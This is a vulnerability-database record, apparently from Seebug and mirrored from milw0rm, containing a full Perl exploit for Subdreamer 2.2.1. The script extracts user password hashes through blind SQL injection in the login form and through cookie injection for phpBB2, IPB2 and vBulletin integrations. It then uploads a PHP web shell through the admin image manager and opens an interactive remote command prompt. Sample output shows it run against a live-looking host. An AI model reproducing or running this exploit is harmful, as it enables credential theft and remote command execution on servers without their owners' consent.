Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-63266", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-63266", "cvelist": [], "description": "No description provided by source.", "viewCount": 8, "published": "2014-07-01T00:00:00", "sourceData": "\n #!/usr/bin/perl\r\n\r\n## Subdreamer 2.2.1 command exec exploit\r\n## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n## supported targets:\r\n## ~ without forum integration\r\n## ~ with phpBB2 integration\r\n## ~ with ipb2 integration\r\n## ~ with vbulletin2 integration\r\n## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n## based on RST/GHC advisory #35\r\n## http://rst.void.ru/papers/advisory35.txt\r\n## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n## (c)oded by 1dt.w0lf - 19/09/2005\r\n## RST/GHC\r\n## http://rst.void.ru\r\n## http://ghc.ru\r\n## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n\r\n## work:\r\n## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n## r57subdreamer.pl -p http://subdreamer.com.ru/ -u 2 -t 1\r\n## ------------------------------------------------------------------\r\n## [~] PATH : http://subdreamer.com.ru/\r\n## [~] USER : 2\r\n## [~] TARGET : 1 - PhpBB2\r\n## [1] STEP 1 : TRY GET USER PASSWORD\r\n## [~] SEARCHING PASSWORD ... [ DONE ]\r\n## -----------------------------------------------------------\r\n## USER_ID: 2\r\n## PASS: 26310e438a5a1fb8622738f1e5d34f8b\r\n## -----------------------------------------------------------\r\n## [2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE\r\n## [+] DONE! THIS USER HAVE ACCESS!\r\n## [3] STEP 3 : UPLOAD FILE\r\n## [+] DONE! FILE "img.php" UPLOADED\r\n## [+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)\r\n## SUBDREAMER# id; uname -a; ls -la;\r\n## ----------------------------------------------------------------\r\n## uid=1003(apache) gid=1003(apache) groups=1003(apache)\r\n## FreeBSD customer-3314.cit-network.net 5.3-RELEASE FreeBSD 5.3-RELEASE #0:\r\n## Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386\r\n## total 24\r\n## drwxrwxrwx 5 enshteyn apache 512 Sep 19 23:04 .\r\n## drwxr-x--- 10 enshteyn apache 512 Sep 17 21:03 ..\r\n## drwxr-xr-x 2 enshteyn apache 512 Sep 10 14:09 Image\r\n## -rw-r--r-- 1 apache apache 48 Sep 19 23:04 img.php\r\n## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 logos\r\n## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 smilies\r\n## ----------------------------------------------------------------\r\n## SUBDREAMER# exit\r\n## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n\r\n## config\r\n## ------\r\n##\r\n## images folder\r\n$img_folder = 'images';\r\n## or try\r\n##$img_folder = 'images/logos';\r\n##\r\n## end config\r\n\r\nuse LWP::UserAgent;\r\nuse HTTP::Cookies;\r\nuse Getopt::Std;\r\n\r\ngetopts('u:p:h:t:');\r\n\r\n$path = $opt_p;\r\n$user = $opt_u;\r\n$hash = $opt_h;\r\n$target = $opt_t || 0;\r\n\r\n$s_num = 1;\r\n$|++;\r\n$n = 0;\r\n\r\n@targets = (\r\n#['target name','colimn1 in database','colimn2 in database','cookie name 1','cookie name 2']\r\n ['Subdreamer without forum','userid','password','sduserid','sdpassword'],\r\n ['PhpBB2','user_id','user_password','phpbb2mysql_data',''],\r\n ['IPB2','id','member_login_key','member_id','pass_hash'],\r\n ['PhpBB2 cookie injection','','','phpbb2mysql_data',''],\r\n ['IPB2 cookie injection','id','','member_id','pass_hash'],\r\n ['Vbulletin cookie injection','userid','','bbuserid','bbpassword'],\r\n);\r\n\r\nif (!$path || !$user || $target<0 || $target>5) { &usage; }\r\n&head();\r\nif($path=~/[^\\/]$/) { $path .= '/'; }\r\nprint "[~] PATH : $path\\r\\n";\r\nprint "[~] USER : $user\\r\\n";\r\nprint "[~] TARGET : $target - $targets[$target][0]\\r\\n";\r\nif($target==1||$target==2||$target==0) {\r\nprint "[1] STEP 1 : TRY GET USER PASSWORD\\r\\n";\r\nif(!$hash){\r\nprint "[~] SEARCHING PASSWORD ... [|]";\r\n\r\nFIND: while(1)\r\n{\r\nif(&found(47,58)==0) { &found(96,103); } \r\n$char = $i;\r\nif ($char=="0") \r\n { \r\n if(length($allchar) > 0){\r\n print qq{\\b\\b DONE ] \r\n-----------------------------------------------------------\r\n USER_ID: $user\r\n PASS: $allchar\r\n-----------------------------------------------------------\r\n};\r\n last FIND;\r\n }\r\n else\r\n {\r\n print "\\b\\b FAILED ]";\r\n }\r\n exit(); \r\n }\r\nelse \r\n { \r\n $allchar .= chr($char); \r\n }\r\n$s_num++;\r\n}\r\n}\r\nelse\r\n{\r\nprint "[~] SKIP. HASH EXISTS\\r\\n"; \r\n$allchar = $hash;\r\n}\r\n}\r\n\r\nprint "[2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE\\r\\n";\r\nif(&check_admin_rights())\r\n {\r\n print "[+] DONE! THIS USER HAVE ACCESS!\\r\\n"; \r\n }\r\nelse\r\n {\r\n print "[-] DAMN! THIS USER NOT ADMIN =(\\r\\n"; \r\n exit();\r\n }\r\n\r\nprint "[3] STEP 3 : UPLOAD FILE\\r\\n";\r\nif(&upload_file())\r\n {\r\n print "[+] DONE! FILE \\"img.php\\" UPLOADED\\r\\n"; \r\n }\r\nelse\r\n { \r\n print "[-] DAMN! UPLOAD ERROR =(\\r\\n"; \r\n exit();\r\n }\r\nprint "[+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)\\r\\n"; \r\n\r\nwhile ()\r\n {\r\n print "SUBDREAMER# ";\r\n while(<STDIN>)\r\n {\r\n $cmd=$_;\r\n chomp($cmd);\r\n exit() if ($cmd eq 'exit');\r\n last;\r\n }\r\n &run($cmd);\r\n }\r\n \r\nsub found($$)\r\n {\r\n my $fmin = $_[0];\r\n my $fmax = $_[1];\r\n if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }\r\n \r\n $r = int($fmax - ($fmax-$fmin)/2);\r\n $check = " BETWEEN $r AND $fmax";\r\n if ( &check($check) ) { &found($r,$fmax); }\r\n else { &found($fmin,$r); }\r\n }\r\n \r\nsub crack($$)\r\n {\r\n my $cmin = $_[0];\r\n my $cmax = $_[1];\r\n $i = $cmin;\r\n while ($i<$cmax)\r\n {\r\n $crcheck = "=$i";\r\n if ( &check($crcheck) ) { return $i; }\r\n $i++;\r\n }\r\n $i = 0;\r\n return $i;\r\n }\r\n \r\nsub check($)\r\n {\r\n $n++;\r\n status();\r\n $ccheck = $_[0];\r\n $username = "no_such_user' OR (".$targets[$target][1]."=".$user." AND (ascii(substring(".$targets[$target][2].",".$s_num.",1))".$ccheck.")) /*";\r\n \r\n $xpl = LWP::UserAgent->new() or die;\r\n $res = $xpl->post($path.'index.php',\r\n {\r\n "loginusername" => $username,\r\n "loginpassword" => "nap0Jlb_Haxep",\r\n "login" => "login",\r\n "Submit now" => "Login"\r\n }\r\n ); \r\n @results = $res->content; \r\n \r\n foreach $result(@results)\r\n {\r\n if ($result =~ /(Database error)|(Invalid SQL)/i)\r\n {\r\n print "\\r\\n[-] SQL SYNTAX ERROR! CHECK TARGET!\\r\\n"; \r\n exit();\r\n }\r\n #print $result;\r\n # english pattern\r\n if ($result =~ /Wrong Password/) { return 1; }\r\n # russian pattern\r\n if ($result =~ /...... ......./) { return 1; }\r\n # russian pattern 2\r\n if ($result =~ /............ ....../) { return 1; }\r\n # russian pattern 3 ( KOI8-R tested on subdreamer.com.ru )\r\n if ($result =~ /...... ......./) { return 1; }\r\n }\r\n return 0;\r\n }\r\n \r\nsub status()\r\n{\r\n $status = $n % 5;\r\n if($status==0){ print "\\b\\b/]"; }\r\n if($status==1){ print "\\b\\b-]"; }\r\n if($status==2){ print "\\b\\b\\\\]"; }\r\n if($status==3){ print "\\b\\b|]"; }\r\n}\r\n\r\nsub check_admin_rights()\r\n {\r\n $xpl = LWP::UserAgent->new() or die;\r\n $cookie_jar = HTTP::Cookies->new( );\r\n $xpl->cookie_jar( $cookie_jar );\r\n ($host = $path) =~ s!http://([^/]*).*!$1!;\r\n\r\nif($target == 1)\r\n {\r\n # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???\r\n #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);\r\n # default phpbb2 cookie \r\n $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);\r\n }\r\n elsif($target == 3)\r\n {\r\n # phpbb2 cookie with sql injection\r\n $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,); \r\n }\r\n elsif($target == 4)\r\n {\r\n # ipb2 cookie with sql injection\r\n $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\\\","/",$host,,,,,); \r\n $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);\r\n }\r\n elsif($target == 5)\r\n {\r\n # Vbulletin cookie with sql injection\r\n $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\\\","/",$host,,,,,); \r\n $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);\r\n }\r\n else\r\n {\r\n # subdreamer || ipb2 cookies\r\n $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);\r\n $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);\r\n }\r\n \r\n $res = $xpl->get($path."admin/index.php");\r\n if($res->content =~ /loginpassword/) { return 0; }\r\n else { return 1; }\r\n }\r\n\r\nsub upload_file()\r\n {\r\n $xpl = LWP::UserAgent->new() or die;\r\n $cookie_jar = HTTP::Cookies->new( );\r\n $xpl->cookie_jar( $cookie_jar );\r\n ($host = $path) =~ s!http://([^/]*).*!$1!;\r\n \r\n if($target == 1)\r\n {\r\n # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???\r\n #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);\r\n # default phpbb2 cookie\r\n $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);\r\n }\r\n elsif($target == 3)\r\n {\r\n # phpbb2 cookie with sql injection\r\n $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,); \r\n }\r\n elsif($target == 4)\r\n {\r\n # ipb2 cookie with sql injection\r\n $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\\\","/",$host,,,,,); \r\n $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);\r\n }\r\n elsif($target == 5)\r\n {\r\n # Vbulletin cookie with sql injection\r\n $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\\\","/",$host,,,,,); \r\n $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);\r\n }\r\n else\r\n {\r\n # subdreamer || ipb2 cookies\r\n $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);\r\n $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);\r\n }\r\n \r\n $res = $xpl->post($path.'admin/imagemanager.php',Content_Type => 'form-data',\r\n Content => [\r\n 'action' => 'uploadimage',\r\n 'folderpath' => "../$img_folder/",\r\n 'MAX_FILE_SIZE' => '1000000',\r\n 'image' => [ \r\n undef,\r\n 'img.php', \r\n Content_type => 'text/plain',\r\n Content => '<? if($_POST[cmd]) { passthru($_POST[cmd]); } ?>', \r\n ],\r\n 'submit' => 'Upload Image',\r\n ],\r\n );\r\n if($res->content =~ /Settings Updated/) { return 1; }\r\n if($res->content =~ /Uploading Errors/) { return 0; }\r\n else { return 1; }\r\n }\r\n\r\nsub run()\r\n {\r\n $xpl = LWP::UserAgent->new() or die;\r\n $res = $xpl->post($path.$img_folder.'/img.php',{'cmd'=>$cmd}); \r\n print "----------------------------------------------------------------\\r\\n";\r\n print $res->content;\r\n print "----------------------------------------------------------------\\r\\n";\r\n }\r\n\r\nsub usage()\r\n {\r\n &head();\r\n print q(| |\r\n| - Usage: |\r\n| r57subdreamer.pl -p <path> -u <user_id> [-t <target>] [-h <hash>] |\r\n| <path> - Path to subdreamer folder |\r\n| <user_id> - User id for bruteforce |\r\n| <hash> - MD5 password hash for this user if you have it =\\) |\r\n| - Available targets: |\r\n| - brute password: |\r\n| 0 - Subdreamer without forum integration ( default ) |\r\n| 1 - Subdreamer with PhpBB2 integration |\r\n| 2 - Subdreamer with IPB2 integration |\r\n| - cookie sql injection, dont need brute password: |\r\n| 3 - Subdreamer with PhpBB2 integration 2 |\r\n| 4 - Subdreamer with IPB2 integration 2 |\r\n| 5 - Subdreamer with Vbulletin integration |\r\n+--------------------------------------------------------------------+\r\n| e.g.: |\r\n| r57subdreamer.pl -p http://127.0.0.1/subdreamer/ -u 1 |\r\n| r57subdreamer.pl -p http://www.subdreamer.com.ru -u 2 -t 1 | \r\n+--------------------------------------------------------------------+\r\n| visit us: http://rst.void.ru , http://ghc.ru |\r\n+--------------------------------------------------------------------+\r\n );\r\n exit();\r\n }\r\n\r\nsub head()\r\n {\r\n print q(\r\n+--------------------------------------------------------------------+\r\n| Subdreamer version 2.2.1 sql injection + command execution exploit |\r\n| by 1dt.w0lf |\r\n| RST/GHC |\r\n+--------------------------------------------------------------------+\r\n);}\r\n\r\n# milw0rm.com [2005-10-31]\r\n\n ", "id": "SSV:63266", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T13:49:41", "reporter": "Root", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645433921, "score": 1659785532}}
{}
Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit